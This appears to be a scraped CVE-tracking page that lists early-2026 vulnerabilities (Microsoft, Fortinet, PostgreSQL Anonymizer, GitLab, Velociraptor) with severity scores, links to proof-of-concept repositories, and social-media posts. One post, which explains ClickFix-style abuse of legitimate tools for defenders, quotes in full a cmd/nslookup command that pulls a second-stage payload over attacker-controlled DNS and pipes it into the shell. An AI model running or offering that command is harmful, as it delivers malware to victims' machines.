Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm

pc-fluesterer.info/wordpress/2

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

##

CVE-2026-2360
(8.0 HIGH)

EPSS: 0.05%

updated 2026-02-12T15:11:02.290000

2 posts

PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a custom operator in the public schema and place malicious code in that operator. This operator will later be executed with superuser privileges when the extension is created. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version. With PostgreS

Sempf at 2026-02-17T18:34:50.684Z ##

Why isn't anyone talking about this PostgreSQL vulnerability? nvd.nist.gov/vuln/detail/cve-2

Did y'all talk about it last week without me?

##

Sempf@infosec.exchange at 2026-02-17T18:34:50.000Z ##

Why isn't anyone talking about this PostgreSQL vulnerability? nvd.nist.gov/vuln/detail/cve-2

Did y'all talk about it last week without me?

##

CVE-2026-21513
(8.8 HIGH)

EPSS: 2.99%

updated 2026-02-11T15:38:13.670000

1 posts

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

linux@activitypub.awakari.com at 2026-02-10T18:55:45.000Z ## Microsoft’s February 2026 Patch Tuesday Addresses 54 CVEs (CVE-2026-21510, CVE-2026-21513) 2 Critical 51 Important 1 Moderate 0 Low Microsoft addresses 54 CVEs in the February 2026 Patch Tuesday ...


Origin | Interest | Match ##

CVE-2026-21510
(8.8 HIGH)

EPSS: 4.65%

updated 2026-02-10T21:31:29

1 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

1 repos

https://github.com/andreassudo/CVE-2026-21510-CVSS-8.8-Important-Windows-Shell-security-feature-bypass

linux@activitypub.awakari.com at 2026-02-10T18:55:45.000Z ## Microsoft’s February 2026 Patch Tuesday Addresses 54 CVEs (CVE-2026-21510, CVE-2026-21513) 2 Critical 51 Important 1 Moderate 0 Low Microsoft addresses 54 CVEs in the February 2026 Patch Tuesday ...


Origin | Interest | Match ##

CVE-2026-22903
(9.8 CRITICAL)

EPSS: 0.57%

updated 2026-02-09T09:30:28

1 posts

An unauthenticated remote attacker can send a crafted HTTP request containing an overly long SESSIONID cookie. This can trigger a stack buffer overflow in the modified lighttpd server, causing it to crash and potentially enabling remote code execution due to missing stack protections.

Matchbook3469@mastodon.social at 2026-02-17T13:44:40.000Z ##

🚨 New security advisory:

CVE-2026-22903 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
advisory.yazoul.net/cve/cve-20

#Cybersecurity #VulnerabilityManagement #CyberSec

##

CVE-2026-1868
(10.0 CRITICAL)

EPSS: 0.03%

updated 2026-02-09T09:30:28

1 posts

GitLab has remediated a vulnerability in the Duo Workflow Service component of GitLab AI Gateway affecting all versions of the AI Gateway from 18.1.6, 18.2.6, 18.3.1 to 18.6.1, 18.7.0, and 18.8.0 in which AI Gateway was vulnerable to insecure template expansion of user supplied data via crafted Duo Agent Platform Flow definitions. This vulnerability could be used to cause Denial of Service or gain

Matchbook3469@mastodon.social at 2026-02-17T11:02:00.000Z ##

🚨 New security advisory:

CVE-2026-1868 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
advisory.yazoul.net/cve/cve-20

#Cybersecurity #SecurityPatching #HackerNews

##

CVE-2025-64155
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-01-20T16:16:06.200000

2 posts

An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests.

4 repos

https://github.com/cyberdudebivash/CYBERDUDEBIVASH-FortiSIEM-CVE-2025-64155-Scanner

https://github.com/horizon3ai/CVE-2025-64155

https://github.com/purehate/CVE-2025-64155-hunter

https://github.com/Mefhika120/Ashwesker-CVE-2025-64155

CVE-2026-20965
(7.6 HIGH)

EPSS: 0.03%

updated 2026-01-13T18:31:18

2 posts

Improper verification of cryptographic signature in Windows Admin Center allows an authorized attacker to elevate privileges locally.

_r_netsec at 2026-02-17T14:43:09.069Z ##

CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center cymulate.com/blog/cve-2026-209

##

_r_netsec@infosec.exchange at 2026-02-17T14:43:09.000Z ##

CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center cymulate.com/blog/cve-2026-209

##

CVE-2025-59922
(7.2 HIGH)

EPSS: 0.05%

updated 2026-01-13T18:31:14

2 posts

An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] vulnerability in Fortinet FortiClientEMS 7.4.3 through 7.4.4, FortiClientEMS 7.4.0 through 7.4.1, FortiClientEMS 7.2.0 through 7.2.10, FortiClientEMS 7.0 all versions may allow an authenticated attacker with at least read-only admin permission to execute unauthorized SQL code or commands

_r_netsec at 2026-02-17T14:43:07.235Z ##

Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all baldur.dk/blog/fortinet-ems-rc

##

_r_netsec@infosec.exchange at 2026-02-17T14:43:07.000Z ##

Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all baldur.dk/blog/fortinet-ems-rc

##

CVE-2025-6264
(5.5 MEDIUM)

EPSS: 0.06%

updated 2025-10-23T01:00:00.913000

1 posts

Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions.  To limit access to some dangerous artifact, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This ar

1 repos

https://github.com/Al-Lord0x/CVE-2025-62641

TrustedAlpaca@infosec.exchange at 2026-02-17T08:13:19.000Z ##

cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.

Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.

When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.

#Malware #ThreatIntel #ThreatIntelligence #ClickFix #SOC #DFIR #Microsoft

##

CVE-2026-02447
(0 None)

EPSS: 0.00%

1 posts

N/A

Mozilla@activitypub.awakari.com at 2026-02-17T05:40:00.000Z ## Firefox 147.0.4: Mozilla исправила пустую страницу новой вкладки и уязвимость в libvpx (CVE-2026-02447) Mozilla Firefox 147.0.4 — четвёртое...

#Технологии

Origin | Interest | Match ##

Visit counter For Websites